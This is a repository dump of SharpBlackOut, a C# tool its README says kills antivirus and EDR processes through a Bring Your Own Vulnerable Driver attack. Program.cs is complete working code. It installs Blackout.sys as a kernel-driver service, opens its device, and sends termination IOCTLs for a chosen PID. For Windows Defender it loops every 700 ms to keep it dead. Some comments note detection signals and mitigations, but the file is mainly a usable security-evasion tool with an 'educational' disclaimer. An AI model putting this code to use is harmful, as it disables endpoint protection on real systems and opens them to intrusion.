├── README.md ├── SharpBlackOut.sln └── SharpBlackOut ├── App.config ├── Program.cs ├── Properties └── AssemblyInfo.cs ├── SharpBlackOut.csproj ├── bin └── Debug │ ├── SharpBlackOut.exe │ ├── SharpBlackOut.exe.config │ └── SharpBlackOut.pdb └── obj └── Debug ├── DesignTimeResolveAssemblyReferences.cache ├── DesignTimeResolveAssemblyReferencesInput.cache ├── SharpBlackOut.csproj.AssemblyReference.cache ├── SharpBlackOut.csproj.CoreCompileInputs.cache ├── SharpBlackOut.csproj.FileListAbsolute.txt ├── SharpBlackOut.csproj.SuggestedBindingRedirects.cache ├── SharpBlackOut.exe └── SharpBlackOut.pdb /README.md: -------------------------------------------------------------------------------- 1 | # SharpBlackout 2 | Terminates AV/EDR processes by leveraging a BYOVD (Bring Your Own Vulnerable Driver) attack 3 | 4 | 5 | > Note: This project is for educational purposes only. 6 | 7 | Sharpblackout is an adaptation of the [@Blackout](https://github.com/ZeroMemoryEx/Blackout) project originally developed in C++ by [@ZeroMemoryEx](https://github.com/ZeroMemoryEx/Blackout), which terminates AV/EDR processes by abusing the vulnerable gmer driver (BYOVD). 8 | 9 | I just wanted to try making it in C#. 10 | 11 | ❗️ **Important:** This requires Administrator privileges for it to work. 12 | 13 | ⚠️ **Warning:** This may be buggy and may fail to keep Defender or other programs terminated. 14 | 15 | All credit to the original author @ZeroMemoryEx. 
16 | 17 | 18 | ## Demo 19 | 20 | ![Sharpblackout](https://github.com/dmcxblue/SharpBlackout/assets/41899653/25f1baa9-d177-43b0-a389-5888c955a217) 21 | 22 | -------------------------------------------------------------------------------- /SharpBlackOut.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 17 4 | VisualStudioVersion = 17.6.33829.357 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SharpBlackOut", "SharpBlackOut\SharpBlackOut.csproj", "{07DFC5AA-5B1F-4CCC-A3D3-816ECCBB6CB6}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {07DFC5AA-5B1F-4CCC-A3D3-816ECCBB6CB6}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {07DFC5AA-5B1F-4CCC-A3D3-816ECCBB6CB6}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {07DFC5AA-5B1F-4CCC-A3D3-816ECCBB6CB6}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {07DFC5AA-5B1F-4CCC-A3D3-816ECCBB6CB6}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {F1CA1828-8368-4CDE-B59A-DACA872C3F5E} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /SharpBlackOut/App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /SharpBlackOut/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using 
System.Diagnostics;
using System.IO;
using System.Reflection; // appears unused in this file
using System.Runtime.InteropServices;
using System.Threading;

// SharpBlackOut: C# port of the "Blackout" BYOVD proof of concept.
//
// Flow as implemented below: validate "-p <pid>", check the PID exists, locate
// "Blackout.sys" in the *current working directory*, register it as a kernel-driver
// service named "Blackout" and start it, open the driver's \\.\Blackout device, send an
// "initialize" IOCTL carrying the PID, then send a "terminate process" IOCTL (in a
// polling loop when the target is MsMpEng, i.e. Windows Defender's service process).
//
// Defender's view: every step is observable from user mode and worth alerting on —
// a non-installer process creating a SERVICE_KERNEL_DRIVER service (System log event
// 7045; Security event 4697 where service-install auditing is enabled), a driver
// loading from a non-system directory, a handle opened to \\.\Blackout, and a process
// issuing DeviceIoControl against that device roughly every 700 ms. The driver load
// itself is blocked when the vulnerable driver is on Microsoft's vulnerable-driver
// blocklist and HVCI/WDAC enforces it; that is the mitigation that stops all of the below.
class Program
{
    // IOCTL codes understood by the Blackout driver. The values are copied from the
    // original project; what the driver does with them is not derivable from this file.
    const uint INITIALIZE_IOCTL_CODE = 0x9876C004;
    // "TERMINSTE" is a typo carried over from the original source (sic).
    const uint TERMINSTE_PROCESS_IOCTL_CODE = 0x9876C094;

    // Service-related constants (standard winsvc.h values).
    const uint SC_MANAGER_ALL_ACCESS = 0xF003F;
    const uint SERVICE_KERNEL_DRIVER = 0x00000001;
    const uint SERVICE_DEMAND_START = 0x00000003;
    const uint SERVICE_ERROR_IGNORE = 0x00000000;
    const uint SERVICE_ALL_ACCESS = 0xF01FF;

    // P/Invoke declarations for driver communication.
    // CharSet.Auto resolves to CreateFileW on NT; SetLastError = true is what makes
    // Marshal.GetLastWin32Error() meaningful after a failed call.
    [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)]
    static extern IntPtr CreateFile(
        string lpFileName,
        uint dwDesiredAccess,
        uint dwShareMode,
        IntPtr lpSecurityAttributes,
        uint dwCreationDisposition,
        uint dwFlagsAndAttributes,
        IntPtr hTemplateFile
    );

    // Input buffer is a single uint (the target PID) passed by reference; the output
    // buffer is a caller-supplied byte array whose contents are never read by this program.
    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool DeviceIoControl(
        IntPtr hDevice,
        uint dwIoControlCode,
        ref uint lpInBuffer,
        uint nInBufferSize,
        [Out] byte[] lpOutBuffer,
        uint nOutBufferSize,
        out uint lpBytesReturned,
        IntPtr lpOverlapped
    );

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool CloseHandle(IntPtr hObject);

    // P/Invoke declarations for service functions (ANSI variants, hence the "A" suffix).
    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Ansi)]
    static extern IntPtr OpenSCManagerA(
        string lpMachineName,
        string lpDatabaseName,
        uint dwDesiredAccess
    );

    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Ansi)]
    static extern IntPtr OpenServiceA(
        IntPtr hSCManager,
        string lpServiceName,
        uint dwDesiredAccess
    );

    // QueryServiceStatus has no A/W variants; CharSet is irrelevant here but harmless.
    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Ansi)]
    static extern bool QueryServiceStatus(
        IntPtr hService,
        out SERVICE_STATUS lpServiceStatus
    );

    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Ansi)]
    static extern bool StartServiceA(
        IntPtr hService,
        uint dwNumServiceArgs,
        IntPtr lpServiceArgVectors
    );

    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Ansi)]
    static extern IntPtr CreateServiceA(
        IntPtr hSCManager,
        string lpServiceName,
        string lpDisplayName,
        uint dwDesiredAccess,
        uint dwServiceType,
        uint dwStartType,
        uint dwErrorControl,
        string lpBinaryPathName,
        string lpLoadOrderGroup,
        IntPtr lpdwTagId,
        string lpDependencies,
        string lpServiceStartName,
        string lpPassword
    );

    [DllImport("advapi32.dll", SetLastError = true)]
    static extern bool CloseServiceHandle(IntPtr hSCObject);

    // Mirrors the Win32 SERVICE_STATUS structure (seven DWORDs, sequential layout).
    [StructLayout(LayoutKind.Sequential)]
    struct SERVICE_STATUS
    {
        public uint dwServiceType;
        public uint dwCurrentState;
        public uint dwControlsAccepted;
        public uint dwWin32ExitCode;
        public uint dwServiceSpecificExitCode;
        public uint dwCheckPoint;
        public uint dwWaitHint;
    }

    // Translated LoadDriver function.
    // It looks for an existing service named "Blackout". If found, it queries its status and starts it if stopped.
    // Otherwise, it creates the service using the provided full driver path and starts it.
    //
    // Returns true when the service is running or was started, false on any SCM failure.
    // Failures are reported only via Console output; the Win32 error code is not surfaced.
    //
    // Caveats visible in the code:
    //  - OpenServiceA failing for any reason (including ERROR_ACCESS_DENIED) is treated as
    //    "service does not exist" and falls through to CreateServiceA; the last error is never checked.
    //  - If a "Blackout" service already exists, its binary path is reused as-is — driverPath
    //    is only used on the create path, so a stale or different driver image would be started.
    //  - The service is never stopped or deleted; the kernel driver stays loaded after this
    //    process exits (persistence that an incident responder should look for).
    static bool LoadDriver(string driverPath)
    {
        const string serviceName = "Blackout";

        // Open the Service Control Manager (requires administrator rights, hence the
        // "try running as administrator" hint printed by the caller).
        IntPtr hSCM = OpenSCManagerA(null, null, SC_MANAGER_ALL_ACCESS);
        if (hSCM == IntPtr.Zero)
        {
            Console.WriteLine("Failed to open Service Control Manager.");
            return false;
        }

        // Check if the service already exists
        IntPtr hService = OpenServiceA(hSCM, serviceName, SERVICE_ALL_ACCESS);
        if (hService != IntPtr.Zero)
        {
            Console.WriteLine("Service already exists.");

            // Query service status
            if (!QueryServiceStatus(hService, out SERVICE_STATUS status))
            {
                Console.WriteLine("Failed to query service status.");
                CloseServiceHandle(hService);
                CloseServiceHandle(hSCM);
                return false;
            }

            // If service is stopped, start it (SERVICE_STOPPED == 1).
            // Any other state (running, start/stop pending, paused) is left untouched
            // and reported as success.
            if (status.dwCurrentState == 1)
            {
                if (!StartServiceA(hService, 0, IntPtr.Zero))
                {
                    Console.WriteLine("Failed to start service.");
                    CloseServiceHandle(hService);
                    CloseServiceHandle(hSCM);
                    return false;
                }
                Console.WriteLine("Starting service...");
            }

            CloseServiceHandle(hService);
            CloseServiceHandle(hSCM);
            return true;
        }

        // Service doesn't exist; create it.
        // Display name == service name; demand-start kernel driver, no load-order group,
        // no dependencies, default (LocalSystem) account for a driver service.
        hService = CreateServiceA(
            hSCM,
            serviceName,
            serviceName,
            SERVICE_ALL_ACCESS,
            SERVICE_KERNEL_DRIVER,
            SERVICE_DEMAND_START,
            SERVICE_ERROR_IGNORE,
            driverPath,
            null,
            IntPtr.Zero,
            null,
            null,
            null
        );

        if (hService == IntPtr.Zero)
        {
            Console.WriteLine("Failed to create service.");
            CloseServiceHandle(hSCM);
            return false;
        }

        Console.WriteLine("Service created successfully.");

        // Start the newly created service.
        if (!StartServiceA(hService, 0, IntPtr.Zero))
        {
            Console.WriteLine("Failed to start service.");
            CloseServiceHandle(hService);
            CloseServiceHandle(hSCM);
            return false;
        }
        Console.WriteLine("Starting service...");

        CloseServiceHandle(hService);
        CloseServiceHandle(hSCM);
        return true;
    }

    // CheckProcess returns true if a process with the given process ID exists.
    // Implemented by probing Process.GetProcessById; the bare catch swallows every
    // exception type (not only the "no such process" ArgumentException), and the
    // returned Process object is never disposed.
    static bool CheckProcess(uint processId)
    {
        try
        {
            Process.GetProcessById((int)processId);
            return true;
        }
        catch
        {
            return false;
        }
    }

    // GetPID returns the process ID for the first process matching the given name.
    // processName is the image name without extension (GetProcessesByName semantics).
    // Returns 0 when no match is found; the Process objects are not disposed.
    static uint GetPID(string processName)
    {
        Process[] processes = Process.GetProcessesByName(processName);
        if (processes.Length > 0)
        {
            return (uint)processes[0].Id;
        }
        return 0;
    }

    // Entry point. Expects exactly two arguments: "-p" followed by a decimal PID.
    static void Main(string[] args)
    {
        // Validate command-line arguments.
        // NOTE(review): the usage string ends after "-p "; the PID placeholder appears
        // to have been lost (possibly stripped as angle-bracket markup).
        if (args.Length != 2 || args[0] != "-p")
        {
            Console.WriteLine("Invalid number of arguments. Usage: Blackout.exe -p ");
            return;
        }

        if (!uint.TryParse(args[1], out uint processId))
        {
            Console.WriteLine("Invalid process id provided.");
            return;
        }

        if (!CheckProcess(processId))
        {
            Console.WriteLine("Provided process id doesn't exist!");
            return;
        }

        // Locate the driver file ("Blackout.sys") in the current directory.
        // This is the process's working directory, not the executable's directory, so
        // the result depends on where the program is launched from.
        string driverFile = "Blackout.sys";
        if (!File.Exists(driverFile))
        {
            Console.WriteLine("Driver file not found!");
            return;
        }

        // The service needs an absolute binary path.
        string fullDriverPath = Path.GetFullPath(driverFile);
        Console.WriteLine($"Driver path: {fullDriverPath}");
        Console.WriteLine($"Loading {driverFile} driver ..");

        if (!LoadDriver(fullDriverPath))
        {
            Console.WriteLine("Failed to load driver, try running the program as administrator!");
            return;
        }
        Console.WriteLine("Driver loaded successfully!");

        // Open a handle to the driver using its symbolic link.
        // 0xC0000000 = GENERIC_READ | GENERIC_WRITE, creation disposition 3 = OPEN_EXISTING.
        // CreateFile reports failure as INVALID_HANDLE_VALUE (-1), hence the second check.
        IntPtr hDevice = CreateFile(@"\\.\Blackout", 0xC0000000, 0, IntPtr.Zero, 3, 0, IntPtr.Zero);
        if (hDevice == IntPtr.Zero || hDevice == new IntPtr(-1))
        {
            Console.WriteLine("Failed to open handle to driver!");
            return;
        }

        // Send the INITIALIZE_IOCTL_CODE command with the process ID.
        // `input` is reused as the in-buffer for every IOCTL below; its value is
        // overwritten inside the Defender loop.
        uint input = processId;
        byte[] output = new byte[8]; // buffer for output (adjust size as needed); never inspected
        if (!DeviceIoControl(hDevice, INITIALIZE_IOCTL_CODE, ref input, (uint)Marshal.SizeOf(input), output, (uint)output.Length, out uint bytesReturned, IntPtr.Zero))
        {
            Console.WriteLine($"Failed to send initializing request 0x{INITIALIZE_IOCTL_CODE:X}!");
            CloseHandle(hDevice);
            return;
        }
        Console.WriteLine($"Driver initialized 0x{INITIALIZE_IOCTL_CODE:X}!");

        // If the target process ID matches Windows Defender's process, repeatedly send termination IOCTL.
        // The loop has no exit other than a DeviceIoControl failure (no Ctrl+C handling,
        // no cancellation); on failure it breaks and falls through to the single
        // "Terminating process" IOCTL below, which is then sent once more with the last PID.
        uint defenderPid = GetPID("MsMpEng");
        if (defenderPid == processId)
        {
            Console.WriteLine("Terminating Windows Defender ..");
            Console.WriteLine("Keep the program running to prevent the service from restarting it");
            bool once = true;
            while (true)
            {
                // Re-resolve the PID each iteration because the service may restart the process.
                input = GetPID("MsMpEng");
                if (input != 0)
                {
                    if (!DeviceIoControl(hDevice, TERMINSTE_PROCESS_IOCTL_CODE, ref input, (uint)Marshal.SizeOf(input), output, (uint)output.Length, out bytesReturned, IntPtr.Zero))
                    {
                        Console.WriteLine($"DeviceIoControl failed. Error: 0x{Marshal.GetLastWin32Error():X}");
                        break;
                    }
                    if (once)
                    {
                        Console.WriteLine("Defender Terminated ..");
                        once = false;
                    }
                }
                // 700 ms polling interval — a steady DeviceIoControl cadence that is
                // itself a usable detection signal.
                Thread.Sleep(700);
            }
        }

        Console.WriteLine("Terminating process ..");
        if (!DeviceIoControl(hDevice, TERMINSTE_PROCESS_IOCTL_CODE, ref input, (uint)Marshal.SizeOf(input), output, (uint)output.Length, out bytesReturned, IntPtr.Zero))
        {
            Console.WriteLine($"Failed to terminate process: 0x{Marshal.GetLastWin32Error():X}!");
        }
        else
        {
            Console.WriteLine("Process has been terminated!");
        }

        // The device handle is released only after the key press; the driver service
        // itself is left installed and running (see LoadDriver).
        Console.WriteLine("Press any key to exit...");
        Console.ReadKey();
        CloseHandle(hDevice);
    }
}
-------------------------------------------------------------------------------- /SharpBlackOut/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 
8 | [assembly: AssemblyTitle("SharpBlackOut")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("SharpBlackOut")] 13 | [assembly: AssemblyCopyright("Copyright © 2023")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("07dfc5aa-5b1f-4ccc-a3d3-816eccbb6cb6")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /SharpBlackOut/SharpBlackOut.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {07DFC5AA-5B1F-4CCC-A3D3-816ECCBB6CB6} 8 | Exe 9 | SharpBlackOut 10 | SharpBlackOut 11 | v4.8 12 | 512 13 | true 14 | true 15 | 16 | 17 | AnyCPU 18 | true 19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 | 4 25 | 26 | 27 | AnyCPU 28 | pdbonly 29 | true 30 | bin\Release\ 31 | TRACE 32 | prompt 33 | 4 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | -------------------------------------------------------------------------------- 
/SharpBlackOut/bin/Debug/SharpBlackOut.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dmcxblue/SharpBlackout/7ac51806d8a133586b827e7f04847aca1e2237e9/SharpBlackOut/bin/Debug/SharpBlackOut.exe -------------------------------------------------------------------------------- /SharpBlackOut/bin/Debug/SharpBlackOut.exe.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /SharpBlackOut/bin/Debug/SharpBlackOut.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dmcxblue/SharpBlackout/7ac51806d8a133586b827e7f04847aca1e2237e9/SharpBlackOut/bin/Debug/SharpBlackOut.pdb -------------------------------------------------------------------------------- /SharpBlackOut/obj/Debug/DesignTimeResolveAssemblyReferences.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dmcxblue/SharpBlackout/7ac51806d8a133586b827e7f04847aca1e2237e9/SharpBlackOut/obj/Debug/DesignTimeResolveAssemblyReferences.cache -------------------------------------------------------------------------------- /SharpBlackOut/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dmcxblue/SharpBlackout/7ac51806d8a133586b827e7f04847aca1e2237e9/SharpBlackOut/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /SharpBlackOut/obj/Debug/SharpBlackOut.csproj.AssemblyReference.cache: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/dmcxblue/SharpBlackout/7ac51806d8a133586b827e7f04847aca1e2237e9/SharpBlackOut/obj/Debug/SharpBlackOut.csproj.AssemblyReference.cache -------------------------------------------------------------------------------- /SharpBlackOut/obj/Debug/SharpBlackOut.csproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | a8325433ab15581c23fd6c99708ef44d7c5812d7 2 | -------------------------------------------------------------------------------- /SharpBlackOut/obj/Debug/SharpBlackOut.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\RedTeam\SharpBlackOut\SharpBlackOut\bin\Debug\SharpBlackOut.exe.config 2 | C:\RedTeam\SharpBlackOut\SharpBlackOut\bin\Debug\SharpBlackOut.exe 3 | C:\RedTeam\SharpBlackOut\SharpBlackOut\bin\Debug\SharpBlackOut.pdb 4 | C:\RedTeam\SharpBlackOut\SharpBlackOut\obj\Debug\SharpBlackOut.csproj.AssemblyReference.cache 5 | C:\RedTeam\SharpBlackOut\SharpBlackOut\obj\Debug\SharpBlackOut.csproj.SuggestedBindingRedirects.cache 6 | C:\RedTeam\SharpBlackOut\SharpBlackOut\obj\Debug\SharpBlackOut.csproj.CoreCompileInputs.cache 7 | C:\RedTeam\SharpBlackOut\SharpBlackOut\obj\Debug\SharpBlackOut.exe 8 | C:\RedTeam\SharpBlackOut\SharpBlackOut\obj\Debug\SharpBlackOut.pdb 9 | -------------------------------------------------------------------------------- /SharpBlackOut/obj/Debug/SharpBlackOut.csproj.SuggestedBindingRedirects.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dmcxblue/SharpBlackout/7ac51806d8a133586b827e7f04847aca1e2237e9/SharpBlackOut/obj/Debug/SharpBlackOut.csproj.SuggestedBindingRedirects.cache -------------------------------------------------------------------------------- /SharpBlackOut/obj/Debug/SharpBlackOut.exe: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/dmcxblue/SharpBlackout/7ac51806d8a133586b827e7f04847aca1e2237e9/SharpBlackOut/obj/Debug/SharpBlackOut.exe -------------------------------------------------------------------------------- /SharpBlackOut/obj/Debug/SharpBlackOut.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dmcxblue/SharpBlackout/7ac51806d8a133586b827e7f04847aca1e2237e9/SharpBlackOut/obj/Debug/SharpBlackOut.pdb --------------------------------------------------------------------------------